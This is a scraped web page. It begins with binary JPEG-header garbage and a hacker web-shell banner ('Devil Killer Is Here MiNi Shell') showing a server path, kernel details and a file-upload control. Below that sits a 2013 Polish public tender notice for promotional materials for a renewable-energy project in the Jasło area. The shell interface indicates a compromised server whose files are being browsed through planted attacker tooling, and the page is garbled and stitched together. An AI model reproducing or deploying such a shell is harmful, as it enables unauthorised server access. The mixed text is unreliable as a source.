JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130823/341880-N-2013.html

<p class="kh_header"><b>Jasło: Opracowanie, wykonanie oraz dostawa materiałów informacyjno-promocyjnych związanych z realizacją Projektu: Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej oraz domach prywatnych na terenie gmin należących do Związku Gmin Dorzecza Wisłoki Nr KIK/66 współfinansowanego przez Szwajcarię w ramach Szwajcarsko-Polskiego Programu Współpracy</b><br>
<b>Numer ogłoszenia: 341880 - 2013; data zamieszczenia: 23.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Gmin Dorzecza Wisłoki , ul. M. Konopnickiej 82, 38-200 Jasło, woj. podkarpackie, tel. 013 4437026, faks 013 4437023.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wisloka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie, wykonanie oraz dostawa materiałów informacyjno-promocyjnych związanych z realizacją Projektu: Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej oraz domach prywatnych na terenie gmin należących do Związku Gmin Dorzecza Wisłoki Nr KIK/66 współfinansowanego przez Szwajcarię w ramach Szwajcarsko-Polskiego Programu Współpracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia realizowanego w trybie przetargu nieograniczonego jest: opracowanie, wykonanie oraz dostawa materiałów informacyjno-promocyjnych związanych z realizacją Projektu, a to:
1. Teczka z tektury falistej szara - 300 szt.,  grzbiet 12mm (? 2mm), format A4,  materiał - tektura falista dwuwarstwowa, dwie gumki na rogach w kolorze czerwonym lub czarnym, w tym:
-150 szt. teczek nadruk reklamowy tłoczony, wg wytycznych Zamawiającego, pole nadruku 12x5 cm (? 2 cm), nadruk jednostronny, 
-150 szt. teczek nadruk reklamowy metodą graweru laserowego, wg wytycznych Zamawiającego, pole nadruku 12x5cm (? 2cm), nadruk jednostronny, + projekty. 
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego. 
2. Torba ekologiczna - 200szt., wymiary 35x39x15cm (? 2cm), materiał juta, grubsze krótkie rączki, kolor naturalny,  nadruk reklamowy metodą sitodruku, jednostronny, pole nadruku 9x5cm (? 2cm), nadruk wg wytycznych Zamawiającego, w tym:
-100 szt. z nadrukiem reklamowym w 1 kolorze dowolnie wybranym przez Zamawiającego, 
-100 szt. toreb z nadrukiem reklamowym do 4 kolorów.
+ projekty.
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
3. Siatka ekologiczna - 2600 szt., materiał bawełna 100%, wymiary 42x38cm (? 2 cm), kolory siatki: naturalny (1300 szt.), czarny (1300 szt.),  nadruk reklamowy metodą sitodruku, jednostronny, pole nadruku 9x5cm (? 2cm), wg wytycznych Zamawiającego, w tym:
-nadruk reklamowy w jednym kolorze na 650 szt. siatek koloru naturalnego, oraz na 650 szt. siatek koloru czarnego;
-nadruk reklamowy do 4 kolorów na 650 szt. siatek koloru naturalnego, oraz na 650 szt. siatek koloru czarnego;
+ projekty.
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
4. Pamięć USB breloczek - 170 szt. - 8 GB, obudowa wykonana z jasnego drewna, 
z zawieszką, nadruk reklamowy dwustronny, wykonany techniką graweru laserowgo,  wg wytycznych Zamawiającego, pole każdego nadruku - 30x14 mm (? 3mm), każde usb pakowane w woreczek foliowy + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
5. Notes z surowców wtórnych - 470 szt. z długopisem, wkład do długopisu koloru niebieskiego, wymiary notesu:  18x13 cm (? 5mm), okładka w kolorze naturalnym (240 szt.) oraz w kolorze czarnym (230 szt.), 70 czystych kartek z papieru 
z recyklingu(? 5). Plastikowe części długopisu mają być biodegradowalne, łączenie spiralą po dłuższym boku, nadruk reklamowy metodą tampondruku lub sitodruku na okładce, jednostronny, powierzchnia nadruku 9x5 cm (? 2 cm), oraz w stopce na każdej kartce jednostronnie, powierzchnia nadruku 10x1,5 cm (? 10 mm), w jednym wybranym kolorze, wg wytycznych Zamawiającego. Nadruk reklamowy na długopisie dwustronny, metodą tampondruku, w jednym dowolnie wybranym kolorze, powierzchnia nadruku 70x6 mm (? 10 mm),
+ projekty.
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
6. Zestaw - 220 szt.,  drewniany długopis z niebieskim wkładem i  drewniany ołówek + etui, z jasnego drewna, długopis i ołówek z metalowymi wykończeniami, nadruk reklamowy wg wytycznych Zamawiającego, grawerowany, na etui nadruk jednostronny - pow. nadruku 70x30 mm (? 5 mm), na długopisie i ołówku nadruk dwustronny, pow. nadruku 40x6 mm (? 2 mm), + projekty. 
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
7. Długopis drewniany - 250 szt., w ozdobnym pudełku, wymiary 17x3x2 cm (? 5 mm), napis reklamowy wg wytycznych Zamawiającego, grawer laserowy, na długopisie dwustronny, pow. nadruku 40x6 mm (? 2 mm) oraz pudełku, pow. nadruku  70x20 mm (? 5 mm), + projekty.
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego
8. Długopis ekologiczny - 2000 szt., wykonany z przetworzonego papieru oraz biodegradowalnego plastiku, skuwka w kolorze czerwonym (1000 szt.), skuwka w kolorze czarnym (1000 szt.), nadruk reklamowy metodą tampondruku, wg wytycznych Zamawiającego, nie więcej niż 4 kolory, wielkość nadruku 70x6 mm(? 3 mm), +projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego
9. Deska z klipem + blok A4 - 170 szt., wymiary 33x23 cm (?2 cm),  materiał tektura lita oklejona (kaszerowana) dwustronnie, nadruk dwustronny na całej pow. deski w pełnym kolorze zabezpieczony folią mat., mechanizm zatrzaskowy do kart i papieru. Blok A4, klejony od góry, 30 kartek w kratkę,  każda ze znakiem wodnym, nadruk reklamowy w pełnym kolorze na każdej kartce oraz  w stopce o pow. 18x2 cm (? 5 mm) wg wytycznych Zamawiającego, + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
10. Parasol reklamowy - 140 szt., materiał poliester 190, rączka drewniana typu laska, średnica czaszy 104 cm (? 2 cm), mechanizm automatyczny, parasole w kolorach: czarnym (70 szt.), czerwonym (70 szt.), nadruk reklamowy w jednym kolorze, wg wytycznych Zamawiającego, metodą sitodruku, na jednym brycie (trójkątna część), pow. nadruku 9x5 cm (? 2 cm), każdy parasol pakowany w torebkę foliową,  + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
11. Parasol typu golf bez automatu - 30 szt., jasny drewniany uchwyt, materiał nylon 190, średnica czaszy 130 cm (? 2 cm), wysokość parasola 103 cm (? 2 cm), kolor biało - czerwony, nadruk reklamowy metodą sitodruku 4 kolory, wg wytycznych Zamawiającego, na jednym brycie, pow. nadruku 9x5 cm (? 2 cm), każdy parasol pakowany w torebkę foliową, + projekty
- czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
- czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
12. Lampa solarna LED - 50 szt., słupek wyposażony w panel słoneczny i żarówki LED, ozdobiony trzema owadami (motyle, ważki), które zapewniają efektowne światło. Wysokość 80 cm (? 3 cm). Pakowana w jednostkowe pudełko z tektury falistej w kolorze naturalnym. Nadruk reklamowy na pudełku oraz lampie - wielkość, miejsce i technika nadruku zostanie uzgodniona z Zamawiającym.
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 21 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
13. Balonik reklamowy - 500 szt., perłowy 14 cali (średnica ok. 34 cm), nadruk dwustronny w jednym kolorze wg wytycznych Zamawiającego, metodą sitodruku, pow. nadruku 16x12 cm (? 3 cm), patyczek i zatyczka do każdego balonika, 250 szt. w kolorze białym i 250 szt. w kolorze czerwonym + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
14. Kartonowe pudełko w kształcie domu - 100 szt., karteczki z surowców wtórnych w kartonowym pudełku w kształcie domku, 100 kartek z papieru z recyklingu plus kolorowe karteczki samoprzylepne na dachu, pudełko o wymiarach 9x8,5x7,5 cm (? 5 mm), nadruk reklamowy metodą tamponadruku do 4 kolorów, wg wytycznych Zamawiającego, pow. nadruku 30x70 mm (? 5 mm),  + projekty 
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
15. Roll-up -  2 szt., w tym: 1 szt. o wymiarach jednostkowych 100x200 cm, (tolerancja ? 10 cm),  1 szt. o wymiarach jednostkowych 150x200 cm, (tolerancja ? 10 cm),  konstrukcja z grubego aluminium, szeroka kaseta z chromowanymi bokami (szeroka podstawa gwarantująca dużą stabilność), składany 3-częściowy maszt aluminiowy, aluminiowa górna listwa zatrzaskowa, wydruk grafiki w pełnym kolorze na banerze o gramaturze 440 g, wg wytycznych Zamawiającego, torba transportowa mieszcząca system wraz ze stelażem umożliwiająca wygodne przenoszenie na ramieniu + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
16. Baner reklamowy - 1 szt., dwustronny, o wymiarach 1,5 m x 3 m (? 10 cm),  materiał przeznaczony do grafiki dwustronnej (nie przenikający), nadruk reklamowy w wysokiej rozdzielczości zabezpieczony lakierem, wg wytycznych Zamawiającego, pełny kolor, brzegi baneru  składane podwójnie oraz zgrzewane, zapewniające dużą wytrzymałość, aluminiowe oczka co 50 cm. (? 10 cm), linka mocująca  + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
17. Smycz reklamowa  - 600 szt., 
-300 szt. o szer. 15 mm (? 2 mm), długość po złożeniu 48 cm (? 5 cm), kolor czerwony, szyta (końce do środka), wykończona karabińczykiem i zawieszką z odczepianą końcówką telefoniczną, nadruk reklamowy transferowy, jednostronny, wg wytycznych Zamawiającego, 4 kolory, + projekty
-300 szt. o szer. 20 mm (? 2 mm), długość po złożeniu 48 cm (? 5 cm), kolor biało - czerwony, szyta (końce do środka, kolor czerwony wewnątrz), wykończona karabińczykiem, nadruk reklamowy jednostronny transferowy na zewnętrznej białej taśmie, wg wytycznych Zamawiającego, 4 kolory, + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
18. Ścianka panelowa łukowa o wymiarach: wys. 3 m szer. 2 m (? 30 cm),  z trybunką  - 1 kompletny system z grafiką,  grafika - druk wykonany technologią cyfrową, na podkładach polipropylenowych z laminatem strukturalnym zabezpieczającym grafikę przed uszkodzeniami mechanicznymi, konstrukcja - aluminium, tworzywo sztuczne, listwy magnetyczne, lampy halogenowe (2 szt.), trybunka z grafiką i blatem, służąca jako sztywny kufer transportowy z kółkami. 
Kształt ścianki zaokrąglony w łuk, możliwość wymiany elementów grafiki. Wysokiej jakości druk grafiki w pełnym kolorze na ściance oraz trybunce,  wg wytycznych Zamawiającego, + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
19. Potykacz aluminiowy - 1 komplet (potykacz wraz grafiką plakatu i główki)  - dwustronny, konstrukcja aluminiowa anodowana w kolorze srebrny mat, stojak wyposażony  w ograniczniki rozstawu nóg, dwustronna ekspozycja plakatu, wysokość po rozłożeniu 1490 mm, szerokość 594 mm (? 10 cm). Wymiary plakatu 594x841 mm (? 10 cm), wymiary plakatu główki 297x594 mm(?10 cm), 4 płyty antyrefleksyjne, wykonanie dwustronnej grafiki plakatu i główki, wydruk wysokiej jakości, pełny kolor, wg wytycznych Zamawiającego, + projekty  
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
20. Sztalugi studyjne trójnożne - 10 szt.,  o wymiarach: szerokość podstawy 71 cm(? 10 cm), całkowita wysokość 184-234 cm(? 10 cm), wysokość płótna 118 cm(? 10 cm),  wykonane z impregnowanego olejem drewna bukowego, z regulacją wysokości. W zestawie do każdej sztalugi tablica malarska wykonana z płyty MDF pokryta płótnem malarskim uniwersalnie gruntowanym o wymiarach 50x70 cm (? 10 cm), napis reklamowy na każdej sztaludze wykonany techniką graweru laserowego, pow. nadruku 7x2,5 cm (? 0,5 cm), wg wytycznych Zamawiającego, + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 21 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
21. Kalendarze ekologiczne ścienne - 12 000 szt., (2x 6000 szt.)
na rok 2014 i 2015  - indywidualne projekty graficzne, wydruk.
Kalendarz 16 stron - 8 kartek: 2 kartki - okładka przód i  tył z tekstem, 6 kartek zawartość - dwanaście obszarów chronionych wraz ze zdjęciami    
-wymiary 22,5x32,5 cm
-papier 135 g/m2, kreda, błysk
-oprawa szyta po krótszym boku,
-druk dwustronny, kolorowy na wszystkich stronach kalendarza
-zawartość kalendarza imieniny, święta, dni wolne od pracy, dni związane z ochroną środowiska np. międzynarodowy dzień ziemi (22.04.), światowy dzień ochrony środowiska (02.06.), międzynarodowy dzień wody (22.03.), międzynarodowy dzień ochrony warstwy ozonowej (16.09.),
-wkład tekstowy oraz zdjęcia przekaże Zamawiający
Nadruk reklamowy na każdej stronie kalendarza wykonany wg wytycznych Zamawiającego
Przewidywane terminy realizacji:
kalendarz na 2014r. - 6000 szt.
-czas przedstawienia projektów - do 31.10.2013r.
-czas dostarczenia gotowego produktu -  do 30.11.2013r.
kalendarz na 2015r. - 6000 szt.
-czas przedstawienia projektów - do 15.10.2014r.
-czas dostarczenia gotowego produktu - do 15.11.2014r.
22. Kalendarz na 2016r. - 5000 szt. , indywidualny projekt graficzny, tekst, wydruk 
Kalendarz 7 planszowy dwustronny - 6 kart środkowych + okładka, o wymiarach 48 cmx33 cm, druk w pełnym kolorze, okładka kreda mat 300g/m2 (na drugiej stronie okładki informacja o realizowanym projekcie), środek kreda mat 170g/m2, spirala z zawieszką po krótszym boku, miejsce na nadruk 33x 6 cm (? 5 mm) na każdej stronie kalendarza, Kalendarium: dni świąteczne w kolorze odróżniającym się od koloru dni powszednich, wszystkie święta muszą być świętami obchodzonymi w Polsce, oznaczenia w języku polskim. Zdjęcia do kalendarza dostarczy Zamawiający.
Każdy kalendarz pakowany w kopertę kartonową z nadrukiem reklamowym, pole nadruku 9x5 cm (? 2 cm), 
Nadruk reklamowy na każdej stronie kalendarza oraz kopercie wykonany w pełnym kolorze metodą sitodruku, wg wytycznych Zamawiającego.
Przewidywany termin realizacji:
-czas przedstawienia projektów - do 01.10.2015r.
-czas dostarczenia gotowego produktu - do 15.11.2015r.
23. Ulotki ekologiczne i ankiety
23.1. Ulotki - 12000 szt. format A4, składane na trzy, druk dwustronny, pełny kolor, papier kreda 135 g/m2 + projekty
Do obowiązku Wykonawcy będzie należało opracowanie graficzne oraz jej druk. Tekst ulotki zostanie przekazany przez Zamawiającego. Druk ulotki może nastąpić po pisemnym zatwierdzeniu projektu ulotki
-czas przedstawienia projektów do 14 dni po podpisaniu Umowy 
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
23.2. Ankiety - 12000 szt., format A4, druk dwustronny offsetowy, czarno-biały,  papier 80g/m2. Tekst do ankiety zostanie przekazany przez Zamawiającego, jej druk może nastąpić po pisemnym zatwierdzeniu projektu przez Zamawiającego.
-czas przedstawienia projektów do 14 dni po podpisaniu Umowy 
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
24. Plakaty informacyjne - dwa rodzaje po 3000 szt.,  format A 2, papier kreda błysk 170 g/m2  (? 3%), druk w pełnym kolorze jednostronny, wykonane na podstawie materiałów przekazanych przez Zamawiającego. Dla każdego rodzaju alternatywne projekty. Realizacja  w 2 transzach, każda po 3000 szt., alternatywne projekty dla każdej transzy
Przewidywane terminy realizacji:	
Plakat Nr 1 - 3000 szt. 
-czas przedstawienia projektów do 31.10.2013r.
-czas dostarczenia gotowego produktu - do 30.11.2013r.
Plakat Nr 2 - 3000 szt. 
-czas przedstawienia projektów do 31.10.2015r.
-czas dostarczenia gotowego produktu - do 30.11.2015r.
25. Ulotki informacyjne (trzy rodzaje)  - 22000 szt.,  format A4,  składane na 3, papier kreda 135 g/m2  (? 3%) ,  dwustronna, pełny kolor, druk offsetowy, opracowane na podstawie materiałów przekazanych przez Zamawiającego. Dla każdego rodzaju alternatywne projekty. Realizacja w 3 transzach, pierwsze dwie po 7333 szt., trzecia w ilości 7334 szt.
Przewidywane terminy realizacji:	
Ulotka Nr 1 (7333 szt.) - 2013r.
-czas przedstawienia projektów do 31.10.2013r.
-czas dostarczenia gotowego produktu - do 30.11.2013r.
Ulotka Nr 2 (7333 szt.) - 2014r.
-czas przedstawienia projektów do 15.10.2014r.
-czas dostarczenia gotowego produktu - do 15.11.2014r.
Ulotka Nr 3 (7334 szt) - 2015.
-czas przedstawienia projektów do 31.10.2015r.
-czas dostarczenia gotowego produktu - do 30.11.2015r.
26. Broszury informacyjne o realizacji Projektu, dwa rodzaje po 1500 szt. - format A5 , 28 stron, środek -papier kreda mat 130 g/m2 , okładka (4 strony) -  papier folia mat 250 g/m2  (? 3%) , druk w pełnym kolorze dwustronny, dwie zszywki, realizacja w dwóch transzach po 1500 szt. (to dwie odrębnie przygotowane broszury). Przedmiot zamówienia obejmuje dla każdego wydania m.in. : przygotowanie broszury, redakcję i korektę tekstów w oparciu na podstawie materiałów przekazanych przez Zamawiającego, skład i opracowanie graficzne, przygotowanie plików produkcyjnych oraz przekazanie ich Zamawiającemu w formacie edytowalnym na nośniku elektronicznym, wydruk broszury, dostarczenie gotowego produktu do siedziby Zamawiającego. 
Przewidywane terminy realizacji:
Broszura Nr 1 - 1500 szt. - 2013r.
-czas przedstawienia projektów do 21 dni po podpisaniu Umowy 
akceptacja, druk, dostarczenie gotowego produktu -  do 30.11. 2013r.
Broszura Nr 2 -  1500 szt. - 2014r.
-czas przedstawienia projektów - do 15.09.2014r.,
-akceptacja, druk, dostarczenie gotowego produktu - do 31.10.2014r.
27. Publikacja podsumowująca Projekt + okładka  - 1200 szt.: format kwadrat L, 48 stron (4 str. okładka + 44 str. wewnętrzne), okładka 300 g/m2 (? 3%) , mat + folia błysk, środek - papier 170 g/m2  mat + lakier dyspersyjny,   druk w pełnym kolorze dwustronny, dwie zszywki, rozmiar broszury 210 mmx210 mm. 
Dla każdego egzemplarza publikacji należy zaprojektować oraz wykonać okładkę z  tektury 900 g, oklejoną papierem kredowym 15 g, zalaminowanym folią matową. Po stronie zewnętrznej druk pełnokolorowy; po stronie wewnętrznej wklejka jednokolorowa i narożniki na publikację i płytę DVD.  
Druk publikacji winien być zrealizowany:
- 1000 szt. w języku polskim,
-  200 szt. w języku angielskim.
Do obowiązków Wykonawcy należało będzie m.in.: przygotowanie publikacji, redakcja i korekta językowa tekstów w oparciu o materiały przekazane przez Zamawiającego, tłumaczenie tekstu na j. angielski, skład i opracowanie graficzne, przygotowanie plików produkcyjnych oraz przekazanie ich Zamawiającemu w formacie edytowalnym na nośniku elektronicznym, wydruk publikacji, dostarczenie gotowego produktu do siedziby Zamawiającego.  
Przewidywane terminy realizacji:
-przedstawienia projektów - 30.09.2015r.,
-akceptacja, druk, dostarczenie gotowego produktu - 30.11.2015r.
28. Poradnik dla użytkowników instalacji solarnych - 4500 szt., wykończenie pozwalające na  wpięcie do segregatora - format A4, 12 kartek, papier 170 g/m2  mat + 2  kartki okładka mat, papier kreda 250 g/m2, dwie zszywki po dłuższym boku, druk w pełnym kolorze dwustronny, Przedmiot zamówienia obejmuje m.in.: przygotowanie poradnika obejmującego redakcję i korektę językową tekstów w oparciu o materiały przekazane przez Zamawiającego, skład i opracowanie graficzne, przygotowanie plików produkcyjnych oraz przekazanie ich Zamawiającemu w formacie edytowalnym na nośniku elektronicznym, wydruk poradnika, dostarczenie gotowego produktu do siedziby Zamawiającego. 
Wkład do poradnika zostanie przekazany przez Zamawiającego.
Przewidywany termin realizacji:
-czas przedstawienia projektów do 28.02.2014r.,
-czas dostarczenia gotowego produktu do 30.03.2014r. 
29. Bluza - 130 szt., materiał polar grubość 280g/m2, kolor czerwony, 100% poliester nie mechacący się polar, długi suwak, fason damski i męski, nadruk reklamowy wykonany metodą haftu, wg wytycznych Zamawiającego, pow. nadruku 6x4 cm (? 1cm), 4 kolory,  
Zamawiający określi ilości sztuk bluz w poszczególnych rozmiarach, po otrzymaniu od Wykonawcy tabeli rozmiarów dla wybranego modelu bluzy 
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
30. Czapka reklamowa z daszkiem - 130 szt., czerwona, 100% bawełna o grubym ściegu, z zapięciem na rzep i obszywanymi wywietrznikami, wykończona białym w kolorze trójwarstwowego daszka, wzmocniony segment przedni, nadruk reklamowy wykonany metodą sitodruku, pow. 6x3 cm (? 1 cm),  4 kolory,  wg wytycznych Zamawiającego, 
 + projekty
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
31. Koszulka - 130 szt., fason damski i męski materiał bawełna 100%, gramatura 170 g/m2, wąska oblamówka wokół szyi, koszulka w kolorze białym z rękawami w kolorze czerwonym, podwójne szwy przy rękawach i u dołu koszulki, bez szwów bocznych, nadruk reklamowy 4 kolory
z przodu pow. nadruku 6x4 cm (? 1 cm),  i tyłu koszulki (na karczku w jednym kolorze) 5x1,5 cm (? 5 mm), metodą sitodruku, 130 szt.,+ projekty.
